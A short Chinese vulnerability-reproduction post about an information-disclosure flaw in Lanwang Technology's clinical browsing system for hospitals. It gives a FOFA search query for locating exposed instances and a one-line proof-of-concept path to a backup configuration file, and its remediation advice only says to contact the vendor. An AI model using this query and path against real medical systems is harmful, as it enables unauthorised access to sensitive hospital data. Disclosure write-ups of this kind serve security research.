【漏洞复现】蓝网科技临床浏览系统信息泄露漏洞

Nx01 产品简介

        蓝网科技临床浏览系统是一个专门用于医疗行业的软件系统,主要用于医生、护士和其他医疗专业人员在临床工作中进行信息浏览、查询和管理。

Nx02 漏洞描述

        蓝网科技临床浏览系统存在信息泄露漏洞,攻击者可以利用该漏洞获取敏感信息。

Nx03 产品主页

fofa-query: title=="临床浏览"

【漏洞复现】蓝网科技临床浏览系统信息泄露漏洞_第1张图片

Nx04 漏洞复现

POC:

/config/config%20bak.txt

【漏洞复现】蓝网科技临床浏览系统信息泄露漏洞_第2张图片

Nx05 修复建议

建议联系软件厂商进行处理。

你可能感兴趣的:(【漏洞复现】,安全,服务器,web安全,网络)